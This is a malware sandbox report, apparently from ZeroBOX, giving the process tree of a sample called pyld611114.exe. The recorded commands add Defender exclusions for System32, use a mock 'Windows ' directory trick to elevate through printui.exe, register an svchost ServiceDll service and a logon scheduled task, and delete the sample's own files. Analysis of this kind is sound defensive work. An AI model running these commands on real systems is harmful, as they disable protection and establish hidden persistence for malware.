| ZeroBOX

pyld611114.exe "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
292
- cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
  2120
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
    2180
- cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
  2452
  - usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
    2520
    - cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
      2720
      - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        2780
    - cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
      2968
      - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
        3040
    - cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
      2112
    - cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
      2336
      - printui.exe "C:\Windows \System32\printui.exe"
        1688
        
        cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
        2632
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        2740
        
        cmd.exe cmd.exe /c sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f && sc start x748413
        2088
        
        sc.exe sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        2192
        
        reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f
        2012
        
        sc.exe sc start x748413
        2644
        
        cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
        536
        
        console_zero.exe "C:\Windows\System32\console_zero.exe"
        2964
        
        cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
        3056
        
        schtasks.exe schtasks /delete /tn "console_zero" /f
        1480
        
        cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        2116
        
        schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        2972
        
        cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
        2988
        
        timeout.exe timeout /t 10 /nobreak
        948
    - cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
      2792
      - timeout.exe timeout /t 10 /nobreak
        2272
- cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
  2612
  - timeout.exe timeout /t 10 /nobreak
    2676

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents